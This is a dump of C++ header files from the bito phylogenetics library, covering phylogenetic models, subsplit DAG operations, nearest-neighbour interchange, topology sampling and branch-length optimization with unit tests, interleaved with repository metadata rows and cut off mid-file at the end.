// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <memory> #include "clock_model.hpp" #include "site_model.hpp" #include "substitution_model.hpp" #include "phylo_flags.hpp" struct PhyloModelSpecification { std::string substitution_; std::string site_; std::string clock_; }; class PhyloModel : public BlockModel { public: PhyloModel(std::unique_ptr<SubstitutionModel> substitution_model, std::unique_ptr<SiteModel> site_model, std::unique_ptr<ClockModel> clock_model); SubstitutionModel* GetSubstitutionModel() const { return substitution_model_.get(); } SiteModel* GetSiteModel() const { return site_model_.get(); } ClockModel* GetClockModel() const { return clock_model_.get(); } static std::unique_ptr<PhyloModel> OfSpecification( const PhyloModelSpecification& specification); void SetParameters(const EigenVectorXdRef param_vector) override; inline const static std::string entire_substitution_key_ = "entire_substitution"; inline const static std::string entire_site_key_ = "entire_site"; inline const static std::string entire_clock_key_ = "entire_clock"; private: std::unique_ptr<SubstitutionModel> substitution_model_; std::unique_ptr<SiteModel> site_model_; std::unique_ptr<ClockModel> clock_model_; }; // Mapkeys for PhyloModel Parameters namespace PhyloModelMapkeys { // Map keys inline static const auto substitution_model_ = PhyloMapkey("SUBSTITUTION_MODEL", PhyloModel::entire_substitution_key_); inline static const auto substitution_model_rates_ = PhyloMapkey("SUBSTITUTION_MODEL_RATES", SubstitutionModel::rates_key_); inline static const auto substitution_model_frequencies_ = PhyloMapkey("SUBSTITUTION_MODEL_FREQUENCIES", SubstitutionModel::frequencies_key_); inline static const auto site_model = PhyloMapkey("SITE_MODEL", PhyloModel::entire_site_key_); inline static const auto clock_model_ = PhyloMapkey("CLOCK_MODEL", PhyloModel::entire_clock_key_); inline static const auto clock_model_rates_ = PhyloMapkey("CLOCK_MODEL_RATES", StrictClockModel::rate_key_); inline static const auto set_ = PhyloMapkeySet("PhyloModel", {substitution_model_, substitution_model_rates_, substitution_model_frequencies_, site_model, clock_model_, clock_model_rates_}); } // namespace PhyloModelMapkeys
2,473
C++
.h
52
43.269231
87
0.748963
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,104
gp_dag.hpp
phylovi_bito/src/gp_dag.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // The purpose of this class is to hold a DAG that we use to build up the operations for // the generalized pruning operations. Note that rootsplit PCSPs and the DAG root node // are excluded from operations. // GPOperationVectors are then consumed and calculated by GPEngine::ProcessOperations(). #pragma once #include "gp_operation.hpp" #include "quartet_hybrid_request.hpp" #include "rooted_tree_collection.hpp" #include "sbn_maps.hpp" #include "subsplit_dag_node.hpp" #include "tidy_subsplit_dag.hpp" #include "pv_handler.hpp" using PLVType = PLVNodeHandler::PLVType; class GPDAG : public TidySubsplitDAG { public: using TidySubsplitDAG::TidySubsplitDAG; // Get the GPEngine index of given PLV type and given node index. size_t GetPLVIndex(PLVType plv_type, NodeId node_id) const; // ** GPOperations: // These methods generate a serial vector of operations, but perform no computation. // These operation vectors can then be computed and consumed by the // GPEngine::ProcessOperations(). // Optimize branch lengths without handling out of date PLVs. [[nodiscard]] GPOperationVector ApproximateBranchLengthOptimization() const; // Schedule branch length, updating PLVs so they are always up to date. [[nodiscard]] GPOperationVector BranchLengthOptimization(); // Schedule branch length, only updating explicit node_ids, updating PLVs so they are // always up to date. [[nodiscard]] GPOperationVector BranchLengthOptimization( const std::set<EdgeId> &edges_to_optimize); // Compute likelihood values l(s|t) for each child subsplit s by visiting // parent subsplit t and generating Likelihood operations for each PCSP s|t. // Compute likelihood values l(s) for each rootsplit s by calling // MarginalLikelihood(). [[nodiscard]] GPOperationVector ComputeLikelihoods() const; // Do a complete two-pass traversal to correctly populate the PLVs. [[nodiscard]] GPOperationVector PopulatePLVs() const; // Fill r-PLVs from leaf nodes to the root nodes. [[nodiscard]] GPOperationVector LeafwardPass() const; // Compute marginal likelihood. [[nodiscard]] GPOperationVector MarginalLikelihood() const; // Fill p-PLVs from root nodes to the leaf nodes. [[nodiscard]] GPOperationVector RootwardPass() const; // Optimize SBN parameters. [[nodiscard]] GPOperationVector OptimizeSBNParameters() const; // Set r-PLVs to zero. [[nodiscard]] GPOperationVector SetLeafwardZero() const; // Set rhat(s) = stationary for the rootsplits s. [[nodiscard]] GPOperationVector SetRhatToStationary() const; // Set p-PLVs to zero. [[nodiscard]] GPOperationVector SetRootwardZero() const; QuartetHybridRequest QuartetHybridRequestOf(NodeId parent_id, bool is_edge_on_left, NodeId child_id) const; private: [[nodiscard]] GPOperationVector LeafwardPass(const NodeIdVector &visit_order) const; [[nodiscard]] GPOperationVector RootwardPass(const NodeIdVector &visit_order) const; void AddPhatOperations(SubsplitDAGNode node, bool is_edge_on_left, GPOperationVector &operations) const; void AddRhatOperations(SubsplitDAGNode node, GPOperationVector &operations) const; void OptimizeSBNParametersForASubsplit(const Bitset &subsplit, GPOperationVector &operations) const; GPOperation RUpdateOfRotated(NodeId node_id, bool rotated) const; // Compute R_HAT(s) = \sum_{t : s < t} P'(s|t) r(t) prior(s|t) void UpdateRHat(NodeId node_id, GPOperationVector &operations) const; void UpdatePHatComputeLikelihood(NodeId node_id, NodeId child_node_id, bool is_edge_on_left, GPOperationVector &operations) const; void OptimizeBranchLengthUpdatePHat(NodeId node_id, NodeId child_node_id, bool is_edge_on_left, GPOperationVector &operations, bool do_optimize_branch_length = true) const; };
4,173
C++
.h
75
49.213333
88
0.726939
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,105
unrooted_tree_collection.hpp
phylovi_bito/src/unrooted_tree_collection.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include "tree_collection.hpp" #include "unrooted_tree.hpp" using PreUnrootedTreeCollection = GenericTreeCollection<UnrootedTree>; class UnrootedTreeCollection : public PreUnrootedTreeCollection { public: // Inherit all constructors. using PreUnrootedTreeCollection::PreUnrootedTreeCollection; UnrootedTreeCollection(const PreUnrootedTreeCollection& pre_collection); static UnrootedTreeCollection OfTreeCollection(const TreeCollection& trees); }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("UnrootedTreeCollection") {} #endif // DOCTEST_LIBRARY_INCLUDED
704
C++
.h
16
42.0625
78
0.83871
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,106
include_doctest.hpp
phylovi_bito/src/include_doctest.hpp
// ** Doctest include must go first for all header tests to run. #if __GNUC__ >= 8 #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wclass-memaccess" #include "doctest.h" #pragma GCC diagnostic pop #else #include "doctest.h" #endif
244
C++
.h
9
26.111111
64
0.761702
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,107
nni_operation.hpp
phylovi_bito/src/nni_operation.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // Subsplit DAG NNI (Nearest Neighbor Interchange): // // An `NNIOperation` contains an output parent/child Subsplit pair which is the // result of an NNI operation on an input parent/child pair. An NNI operation can be // seen as a swapping of the branches in the SubsplitDAG, or alternatively as a a // reordering of the set of clades in an input parent/child pair: the parent's sister // clade, the child's left clade, and the child's right clade. For any given // parent/child pair, there are two possible NNIs: swapping the sister clade with the // left child clade, or swapping the sister clade with the right child clade. // // The `NNISet` is a set of `NNIOperations` used to account for all "adjacent" NNIs // to a SubsplitDAG. That is, all output parent/child pairs which can be generated from // a single NNI operation on an input parent/child pair taken from the set of all the // parent/child pairs currently in the SubsplitDAG, where the output parent/child pair // is not also already in the SubpslitDAG. #pragma once #include "sugar.hpp" #include "bitset.hpp" #include "subsplit_dag_storage.hpp" // * Nearest Neighbor Interchange Operation // NNIOperation stores output parent/child pair which are the product of an NNI. class NNIOperation { public: NNIOperation() : parent_(0), child_(0){}; NNIOperation(Bitset parent, Bitset child) : parent_(parent), child_(child) { focal_clade_ = Bitset::SubsplitIsChildOfWhichParentClade(parent_, child_); }; NNIOperation(const std::string &parent, const std::string child) : NNIOperation(Bitset(parent), Bitset(child)) {} // Types of clades in the NNI (two from parent subsplit and two from the child // subsplit). enum class NNIClade { ParentFocal, ParentSister, ChildLeft, ChildRight }; static const inline size_t NNICladeCount = 4; class NNICladeEnum : public EnumWrapper<NNIClade, size_t, NNICladeCount, NNIClade::ParentFocal, NNIClade::ChildRight> { }; // Types of NNI adjacencies (includes the central/focal edge). enum class NNIAdjacent { Parent, Sister, Focal, LeftChild, RightChild }; static const inline size_t NNIAdjacentCount = 5; class NNIAdjacentEnum : public EnumWrapper<NNIAdjacent, size_t, NNIAdjacentCount, NNIAdjacent::Parent, NNIAdjacent::RightChild> {}; using NNICladeArray = NNICladeEnum::Array<NNIClade>; // ** Comparator // NNIOperations are ordered according to the std::bitset ordering of their parent // subsplit, then the std::bitset order their child subsplit. static int Compare(const NNIOperation &nni_a, const NNIOperation &nni_b); int Compare(const NNIOperation &nni_b) const; friend bool operator<(const NNIOperation &lhs, const NNIOperation &rhs); friend bool operator>(const NNIOperation &lhs, const NNIOperation &rhs); friend bool operator<=(const NNIOperation &lhs, const NNIOperation &rhs); friend bool operator>=(const NNIOperation &lhs, const NNIOperation &rhs); friend bool operator==(const NNIOperation &lhs, const NNIOperation &rhs); friend bool operator!=(const NNIOperation &lhs, const NNIOperation &rhs); // ** Special Constructors // Produces the neighboring NNI, resulting from a clade swap between the // sister clade and a child clade. NNIOperation GetNeighboringNNI( const SubsplitClade child_clade_swapped_with_sister) const; static NNIOperation GetNeighboringNNI( const Bitset parent_in, const Bitset child_in, const SubsplitClade child_clade_swapped_with_sister, const SubsplitClade focal_clade); // If it is not known which is focal clade, it can be inferred by this overload. static NNIOperation GetNeighboringNNI( const Bitset parent_in, const Bitset child_in, const SubsplitClade child_clade_swapped_with_sister); // ** Getters Bitset GetClade(const NNIClade &nni_clade) const { switch (nni_clade) { case NNIClade::ParentFocal: return GetFocalClade(); case NNIClade::ParentSister: return GetSisterClade(); case NNIClade::ChildLeft: return GetLeftChildClade(); case NNIClade::ChildRight: return GetRightChildClade(); default: Failwith("Invalid NNIClade given."); } }; const Bitset &GetParent() const { return parent_; }; const Bitset &GetChild() const { return child_; }; Bitset GetCentralEdgePCSP() const { return Bitset::PCSP(GetParent(), GetChild()); } Bitset GetFocalClade() const { return GetParent().SubsplitGetClade(WhichCladeIsFocal()); }; Bitset GetSisterClade() const { return GetParent().SubsplitGetClade(WhichCladeIsSister()); } Bitset GetLeftChildClade() const { return GetChild().SubsplitGetClade(SubsplitClade::Left); } Bitset GetRightChildClade() const { return GetChild().SubsplitGetClade(SubsplitClade::Right); } // ** Query SubsplitClade WhichCladeIsFocal() const { return focal_clade_; } SubsplitClade WhichCladeIsSister() const { return SubsplitCladeEnum::Opposite(focal_clade_); } // Checks whether two NNIs are neighbors. That is whether one is the result of an NNI // operation on the other. static bool AreNNIOperationsNeighbors(const NNIOperation &nni_a, const NNIOperation &nni_b); // Given two neighboring NNIs returns which child clade can be swapped with the // sister clade in the `pre_nni` to produce the `post_nni`. static SubsplitClade WhichCladeSwapWithSisterToCreatePostNNI( const NNIOperation &pre_nni, const NNIOperation &post_nni); // ** Miscellaneous size_t Hash() const { return GetCentralEdgePCSP().Hash(); } // Finds mappings of sister, left child, and right child clades from Pre-NNI to NNI. static NNICladeArray BuildNNICladeMapFromPreNNIToNNI(const NNIOperation &pre_nni, const NNIOperation &post_nni); std::pair<Direction, SubsplitClade> GetDirectionAndSubsplitCladeByNNIClade( const NNIClade &nni_clade) { switch (nni_clade) { case NNIClade::ParentFocal: return {Direction::Rootward, WhichCladeIsFocal()}; case NNIClade::ParentSister: return {Direction::Rootward, WhichCladeIsSister()}; case NNIClade::ChildLeft: return {Direction::Leafward, SubsplitClade::Left}; case NNIClade::ChildRight: return {Direction::Leafward, SubsplitClade::Right}; default: Failwith("Invalid NNIClade given."); } } // Checks that NNI Operation is in valid state. // - Parent and Child are adjacent Subsplits. bool IsValid(); std::string ToString() const; std::string ToHashString(const size_t length = 16) const; std::string ToSplitHashString(const size_t length = 5) const; friend std::ostream &operator<<(std::ostream &os, const NNIOperation &nni); Bitset parent_; Bitset child_; SubsplitClade focal_clade_; }; using NNISet = std::set<NNIOperation>; using NNIVector = std::vector<NNIOperation>; using NNIClade = NNIOperation::NNIClade; using NNICladeEnum = NNIOperation::NNICladeEnum; using NNIAdjacent = NNIOperation::NNIAdjacent; using NNIAdjacentEnum = NNIOperation::NNIAdjacentEnum; template <typename T> struct NNIAdjacentMap { T parent; T sister; T focal; T left_child; T right_child; T &operator[](NNIAdjacent nni_edge) { switch (nni_edge) { case NNIAdjacent::Parent: return parent; case NNIAdjacent::Sister: return sister; case NNIAdjacent::Focal: return focal; case NNIAdjacent::LeftChild: return left_child; case NNIAdjacent::RightChild: return right_child; } Failwith("ERROR: Invalid enum given."); } const T &operator[](NNIAdjacent nni_edge) const { switch (nni_edge) { case NNIAdjacent::Parent: return parent; case NNIAdjacent::Sister: return sister; case NNIAdjacent::Focal: return focal; case NNIAdjacent::LeftChild: return left_child; case NNIAdjacent::RightChild: return right_child; } Failwith("ERROR: Invalid enum given."); } }; using NNIAdjEdgeIds = NNIAdjacentMap<EdgeId>; using NNIAdjNodeIds = NNIAdjacentMap<NodeId>; using NNIAdjBools = NNIAdjacentMap<bool>; using NNIAdjDoubles = NNIAdjacentMap<double>; using NNIAdjPCSPs = NNIAdjacentMap<Bitset>; using NNIAdjEdgeIdMap = NNIAdjacentMap<std::pair<EdgeId, EdgeId>>; // This is how we inject a hash routine and a custom comparator into the std // namespace so that we can use unordered_map and unordered_set. // https://en.cppreference.com/w/cpp/container/unordered_map namespace std { template <> struct hash<NNIOperation> { size_t operator()(const NNIOperation &x) const { return x.Hash(); } }; template <> struct equal_to<NNIOperation> { bool operator()(const NNIOperation &lhs, const NNIOperation &rhs) const { return lhs == rhs; } }; } // namespace std #ifdef DOCTEST_LIBRARY_INCLUDED // See tree diagram at: // https://user-images.githubusercontent.com/31897211/136849710-de0dcbe3-dc2b-42b7-b3de-dd9b1a60aaf4.gif TEST_CASE("NNIOperation") { // Clades for NNI. Bitset X("100"); Bitset Y("010"); Bitset Z("001"); // Initial Child and Parent. Bitset parent_in = Bitset::Subsplit(X, Y | Z); Bitset child_in = Bitset::Subsplit(Y, Z); NNIOperation nni_yz = NNIOperation(parent_in, child_in); // Correct Solutions. Bitset correct_parent_xy = Bitset::Subsplit(Y, X | Z); Bitset correct_child_xy = Bitset::Subsplit(X, Z); NNIOperation correct_nni_xy = NNIOperation(correct_parent_xy, correct_child_xy); Bitset correct_parent_xz = Bitset::Subsplit(Z, Y | X); Bitset correct_child_xz = Bitset::Subsplit(Y, X); NNIOperation correct_nni_xz = NNIOperation(correct_parent_xz, correct_child_xz); // Swap X and Y auto nni_xy = nni_yz.GetNeighboringNNI(SubsplitClade::Left); CHECK_EQ(correct_nni_xy, nni_xy); // Swap X and Z auto nni_xz = nni_yz.GetNeighboringNNI(SubsplitClade::Right); CHECK_EQ(correct_nni_xz, nni_xz); // Relationship is known (child_in is the rotated clade of parent_in) auto nni_xy_2 = NNIOperation::GetNeighboringNNI( parent_in, child_in, SubsplitClade::Left, SubsplitClade::Right); CHECK_EQ(correct_nni_xy, nni_xy_2); CHECK_THROWS(NNIOperation::GetNeighboringNNI(parent_in, child_in, SubsplitClade::Left, SubsplitClade::Left)); }; TEST_CASE("NNIOperation: NNISet") { // Clades for NNI. Bitset X("100"); Bitset Y("010"); Bitset Z("001"); // Initial Child and Parent. Bitset parent_in = Bitset::Subsplit(X, Y | Z); Bitset child_in = Bitset::Subsplit(Y, Z); NNIOperation nni_yz = NNIOperation(parent_in, child_in); auto nni_xy = nni_yz.GetNeighboringNNI(SubsplitClade::Left); auto nni_xz = nni_yz.GetNeighboringNNI(SubsplitClade::Right); // Insert NNIs in various orders. NNISet set_of_nnis_1 = NNISet(); set_of_nnis_1.insert(nni_yz); set_of_nnis_1.insert(nni_xy); set_of_nnis_1.insert(nni_xz); NNISet set_of_nnis_2 = NNISet(); set_of_nnis_2.insert(nni_xy); set_of_nnis_2.insert(nni_xz); set_of_nnis_2.insert(nni_yz); // Check proper ordering. for (const auto &set_of_nnis : {set_of_nnis_1, set_of_nnis_2}) { NNIOperation prv_nni = *set_of_nnis.begin(); for (const auto &nni : set_of_nnis) { CHECK_MESSAGE(nni >= prv_nni, "NNIs not ordered in NNISet."); } } } TEST_CASE("NNIOperation: NNI Clade Mapping") { // Clades for NNI. std::vector<Bitset> clades = {Bitset("100"), Bitset("010"), Bitset("001")}; // Iterate over all possible assignments of {X,Y,Z} clades to {sister, left, // right}. std::vector<std::array<size_t, 3>> assignments; for (size_t x = 0; x < 3; x++) { for (size_t y = 0; y < 3; y++) { if (y == x) { continue; } for (size_t z = 0; z < 3; z++) { if ((z == x) || (z == y)) { continue; } assignments.push_back({x, y, z}); } } } // For each possible pre-NNI, check that NNI produces the correct mapping. for (const auto assign : assignments) { const Bitset X(clades[assign[0]]); const Bitset Y(clades[assign[1]]); const Bitset Z(clades[assign[2]]); const Bitset parent = Bitset::Subsplit(X, Y | Z); const Bitset child = Bitset::Subsplit(Y, Z); const NNIOperation pre_nni(parent, child); for (const auto which_clade_swap : SubsplitCladeEnum::Iterator()) { const auto post_nni = pre_nni.GetNeighboringNNI(which_clade_swap); const auto clade_map = NNIOperation::BuildNNICladeMapFromPreNNIToNNI(pre_nni, post_nni); for (const auto pre_clade_type : {NNIClade::ParentSister, NNIClade::ChildLeft, NNIClade::ChildRight}) { const auto post_clade_type = clade_map[pre_clade_type]; CHECK_MESSAGE( pre_nni.GetClade(pre_clade_type) == post_nni.GetClade(post_clade_type), "NNI Clade Map did not produce a proper mapping."); } } } } #endif // DOCTEST_LIBRARY_INCLUDED
13,169
C++
.h
311
37.636656
104
0.706956
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,108
topology_sampler.hpp
phylovi_bito/src/topology_sampler.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // A class that samples one tree topology per call to the Sample() function. // The parameters are as follows: // node - a node to start sampling for // dag - the SubsplitDAG that owns "node" // normalized_sbn_parameters - edge probabilities for leafward sampling // inverted_probabilities - edge probabilities for rootward sampling #pragma once #include "subsplit_dag.hpp" #include "node.hpp" #include "mersenne_twister.hpp" class TopologySampler { public: // Sample a single tree from the DAG according to the provided edge // probabilities. Node::NodePtr Sample(SubsplitDAGNode node, SubsplitDAG& dag, EigenConstVectorXdRef normalized_sbn_parameters, EigenConstVectorXdRef inverted_probabilities); // Set a seed value for the internal random number generator. void SetSeed(uint64_t seed); private: struct SamplingSession { SubsplitDAG& dag_; EigenConstVectorXdRef normalized_sbn_parameters_; EigenConstVectorXdRef inverted_probabilities_; SubsplitDAGStorage result_; }; // Called for each newly sampled node. Direction and clade are pointing to the // previously visited node. void VisitNode(SamplingSession& session, SubsplitDAGNode node, Direction direction, SubsplitClade clade); // Continue sampling in the rootward direction from `node`. void SampleRootward(SamplingSession& session, SubsplitDAGNode node); // Continue sampling in the leafward direction and specified `clade` from `node`. void SampleLeafward(SamplingSession& session, SubsplitDAGNode node, SubsplitClade clade); // Choose a parent node (and return it with the corresponding edge) according to // the values in `inverted_probabilities`. std::pair<SubsplitDAGNode, ConstLineView> SampleParentNodeAndEdge( SamplingSession& session, ConstNeighborsView left, ConstNeighborsView right); // Choose a child node among the `neighbors` clade according to the values // in `normalized_sbn_parameters`. std::pair<SubsplitDAGNode, ConstLineView> SampleChildNodeAndEdge( SamplingSession& session, ConstNeighborsView neighbors); // Construct a Node topology from a successful sampling. Recursion is started // by passing the root node. Node::NodePtr BuildTree(SamplingSession& session, const DAGVertex& node); MersenneTwister mersenne_twister_; }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("TopologySampler") { Driver driver; auto tree_collection = RootedTreeCollection::OfTreeCollection( driver.ParseNewickFile("data/five_taxon_rooted_more_2.nwk")); SubsplitDAG dag(tree_collection); EigenVectorXd normalized_sbn_parameters = dag.BuildUniformOnTopologicalSupportPrior(); EigenVectorXd node_probabilities = dag.UnconditionalNodeProbabilities(normalized_sbn_parameters); EigenVectorXd inverted_probabilities = dag.InvertedGPCSPProbabilities(normalized_sbn_parameters, node_probabilities); SubsplitDAGNode origin = dag.GetDAGNode(NodeId(5)); TopologySampler sampler; std::map<std::string, size_t> counts; const size_t iterations = 10000; for (size_t i = 0; i < iterations; ++i) { auto tree = sampler.Sample(origin, dag, normalized_sbn_parameters, inverted_probabilities); ++counts[tree->Newick([](const Node* node) { if (!node->IsLeaf()) return std::string(); return std::string("x") + std::to_string(node->Id()); })]; } for (auto& i : counts) { const double observed = static_cast<double>(i.second) / iterations; const double expected = 1.0 / 3.0; CHECK_LT(fabs(observed - expected), 5e-2); } } TEST_CASE("TopologySampler: Non-uniform prior") { Driver driver; auto tree_collection = RootedTreeCollection::OfTreeCollection( driver.ParseNewickFile("data/five_taxon_rooted_more_2.nwk")); SubsplitDAG dag(tree_collection); std::vector<double> params{0.5, 0.3, 0.2, 1.0, 1.0, 1.0, 1.0, 1.0, 0.8, 0.2, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0}; EigenVectorXd normalized_sbn_parameters = EigenVectorXd::Map(params.data(), params.size()); EigenVectorXd node_probabilities = dag.UnconditionalNodeProbabilities(normalized_sbn_parameters); EigenVectorXd inverted_probabilities = dag.InvertedGPCSPProbabilities(normalized_sbn_parameters, node_probabilities); SubsplitDAGNode origin = dag.GetDAGNode(NodeId(5)); TopologySampler sampler; std::map<std::string, size_t> counts; std::map<std::string, double> expected = { {"((((x0,x1),x2),(x3,x4)));", 0.312}, {"(((x0,x1),(x2,(x3,x4))));", 0.52}, {"((x0,(x1,(x2,(x3,x4)))));", 0.1666}, }; const size_t iterations = 10000; for (size_t i = 0; i < iterations; ++i) { auto tree = sampler.Sample(origin, dag, normalized_sbn_parameters, inverted_probabilities); ++counts[tree->Newick([](const Node* node) { if (!node->IsLeaf()) return std::string(); return std::string("x") + std::to_string(node->Id()); })]; } for (auto& [tree, count] : counts) { const double observed = static_cast<double>(count) / iterations; CHECK_LT(fabs(observed - expected[tree]), 5e-2); } } #endif // DOCTEST_LIBRARY_INCLUDED
5,395
C++
.h
116
41.637931
88
0.714856
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,109
mersenne_twister.hpp
phylovi_bito/src/mersenne_twister.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <random> class MersenneTwister { public: inline void SetSeed(uint64_t seed) { random_generator_.seed(seed); } inline std::mt19937 &GetGenerator() const { return random_generator_; }; private: static std::random_device random_device_; static std::mt19937 random_generator_; };
434
C++
.h
12
34
74
0.76555
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,110
dag_branch_handler.hpp
phylovi_bito/src/dag_branch_handler.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // This class handles data on the DAG in the form of a DAGData object and DAG branch // lengths, including storage and resizing of data vectors and branch length // optimization. #pragma once #include "gp_dag.hpp" #include "dag_data.hpp" #include "optimization.hpp" #include "substitution_model.hpp" #include "tree.hpp" class DAGBranchHandler { public: DAGBranchHandler(const size_t count, std::optional<OptimizationMethod> method = std::nullopt); DAGBranchHandler(GPDAG& dag, std::optional<OptimizationMethod> method = std::nullopt); // ** Comparators static int Compare(const DAGBranchHandler& lhs, const DAGBranchHandler& rhs); friend bool operator==(const DAGBranchHandler& lhs, const DAGBranchHandler& rhs); // ** Counts size_t GetCount() { return GetBranchLengths().GetCount(); } size_t GetSpareCount() { return GetBranchLengths().GetSpareCount(); } size_t GetAllocCount() { return GetBranchLengths().GetAllocCount(); } void SetCount(const size_t count) { GetBranchLengths().SetCount(count); GetBranchDifferences().SetCount(count); } void SetSpareCount(const size_t count) { GetBranchLengths().SetSpareCount(count); GetBranchDifferences().SetSpareCount(count); } void SetAllocCount(const size_t count) { GetBranchLengths().SetAllocCount(count); GetBranchDifferences().SetAllocCount(count); } // Number of optimization iterations called. size_t GetOptimizationCount() const { return optimization_count_; } // Reset optimization iterations to zero, and reset branch length differences to zero. void ResetOptimizationCount() { optimization_count_ = 0; differences_.FillWithDefault(); } // Add one optimization iteration to count. void IncrementOptimizationCount() { optimization_count_++; } // Checks if called current optimization iteration is the first. bool IsFirstOptimization() const { return optimization_count_ == 0; } // ** Access // Get the size of the data vector. size_t size() const { return branch_lengths_.size(); } // Get underlying DAGData objects for Branch Lengths. DAGEdgeDoubleData& GetBranchLengths() { return branch_lengths_; } const DAGEdgeDoubleData& GetBranchLengths() const { return branch_lengths_; } void SetBranchLengths(EigenVectorXd& branch_lengths) { GetBranchLengths().SetDAGData(branch_lengths); } // Get underlying DAGData objects for Branch Differences. DAGEdgeDoubleData& GetBranchDifferences() { return differences_; } const DAGEdgeDoubleData& GetBranchDifferences() const { return differences_; } void SetBranchDifferences(EigenVectorXd& differences) { GetBranchDifferences().SetDAGData(differences); } // Get underlying EigenVector for Branch Lengths. EigenVectorXd& GetBranchLengthData() { return branch_lengths_.GetData(); } const EigenVectorXd& GetBranchLengthData() const { return branch_lengths_.GetData(); } // Get underlying EigenVector for Branch Differences. EigenVectorXd& GetBranchDifferenceData() { return differences_.GetData(); } const EigenVectorXd& GetBranchDifferenceData() const { return differences_.GetData(); } // Access elements in data vector. double& Get(const EdgeId edge_id) { return branch_lengths_(edge_id); } const double& Get(const EdgeId edge_id) const { return branch_lengths_(edge_id); } double& operator()(const EdgeId edge_id) { return Get(edge_id); } const double& operator()(const EdgeId edge_id) const { return Get(edge_id); } double& GetBranchDifference(const EdgeId edge_id) { return differences_(edge_id); } const double& GetBranchDifference(const EdgeId edge_id) const { return differences_(edge_id); } // References. const bool HasDAG() const { return dag_ != nullptr; } const void SetDAG(GPDAG& dag) { dag_ = &dag; } const GPDAG& GetDAG() const { Assert(HasDAG(), "Reference DAG cannot be accessed before it has been set."); return *dag_; } const bool HasGraftDAG() const { return graft_dag_ != nullptr; } const void SetGraftDAG(GraftDAG& graft_dag) { graft_dag_ = &graft_dag; } const GraftDAG& GetGraftDAG() const { Assert(HasGraftDAG(), "Reference GraftDAG cannot be accessed before it has been set."); return *graft_dag_; } // Method used for branch length optimization. void SetOptimizationMethod(const OptimizationMethod method) { optimization_method_ = method; } OptimizationMethod GetOptimizationMethod() const { return optimization_method_; } // Set number of significant digits of precision used in branch length optimization. void SetSignificantDigitsForOptimization(int significant_digits) { significant_digits_for_optimization_ = significant_digits; } double GetSignificantDigitsForOptimization() const { return significant_digits_for_optimization_; } // Set initial values for branch length optimization. void SetDefaultBranchLength(double default_branch_length) { branch_lengths_.SetDefaultValue(default_branch_length); } double GetDefaultBranchLength() const { return branch_lengths_.GetDefaultValue(); } // ** Resize // Resize using given count. void Resize(std::optional<const size_t> edge_count = std::nullopt, std::optional<const size_t> spare_count = std::nullopt, std::optional<const size_t> explicit_alloc = std::nullopt, std::optional<const Reindexer> reindexer = std::nullopt) { branch_lengths_.Resize(edge_count, spare_count, explicit_alloc, reindexer); differences_.Resize(edge_count, spare_count, explicit_alloc, reindexer); } // Resize using reference DAG. void Resize(std::optional<const size_t> explicit_alloc = std::nullopt, std::optional<const Reindexer> reindexer = std::nullopt) { branch_lengths_.Resize(GetDAG(), explicit_alloc, reindexer); differences_.Resize(GetDAG(), explicit_alloc, reindexer); } // ** Evaluation Functions // Each optimization method needs an evaluation function should take in an edge, its // parent and child nodes, and a branch length, and return a set of specified values // according to the optimization method, such as the log likelihood and its // derivatives. // - Takes the following args: (1) focal EdgeId, (2) rootward PVId (parent node's // RFocal PV), (3) leafward PVId (child node's P PV), (4) log branch length of focal // edge. using LogLikelihoodAndDerivativeFunc = std::function<DoublePair(EdgeId, PVId, PVId, double)>; using LogLikelihoodAndFirstTwoDerivativesFunc = std::function<Tuple3<double>(EdgeId, PVId, PVId, double)>; using NegLogLikelihoodFunc = std::function<double(EdgeId, PVId, PVId, double)>; using NegLogLikelihoodAndDerivativeFunc = std::function<DoublePair(EdgeId, PVId, PVId, double)>; // Set helper function for Nongradient Brent. Function takes a branch length and // returns the negative log likelihood. void SetBrentFunc(NegLogLikelihoodFunc brent_nongrad_func) { brent_nongrad_func_ = brent_nongrad_func; } NegLogLikelihoodFunc GetBrentFunc() { return brent_nongrad_func_; } // Set helper function for Gradient Brent. Function takes a branch length and returns // the negative log likelihood and the first derivative. void SetBrentWithGradientFunc(NegLogLikelihoodAndDerivativeFunc brent_grad_func) { brent_grad_func_ = brent_grad_func; } NegLogLikelihoodAndDerivativeFunc GetBrentWithGradientFunc() { return brent_grad_func_; } // Set helper function for Gradient Ascent. Function should return the log likelihood // and the first derivative. void SetGradientAscentFunc(LogLikelihoodAndDerivativeFunc gradient_ascent_func) { gradient_ascent_func_ = gradient_ascent_func; } LogLikelihoodAndDerivativeFunc GetGradientAscentFunc() { return gradient_ascent_func_; } // Set helper function for Gradient Ascent. Function takes a log branch length and // returns the log likelihood and the first derivative. void SetLogSpaceGradientAscentFunc( LogLikelihoodAndDerivativeFunc logspace_gradient_ascent_func) { logspace_gradient_ascent_func_ = 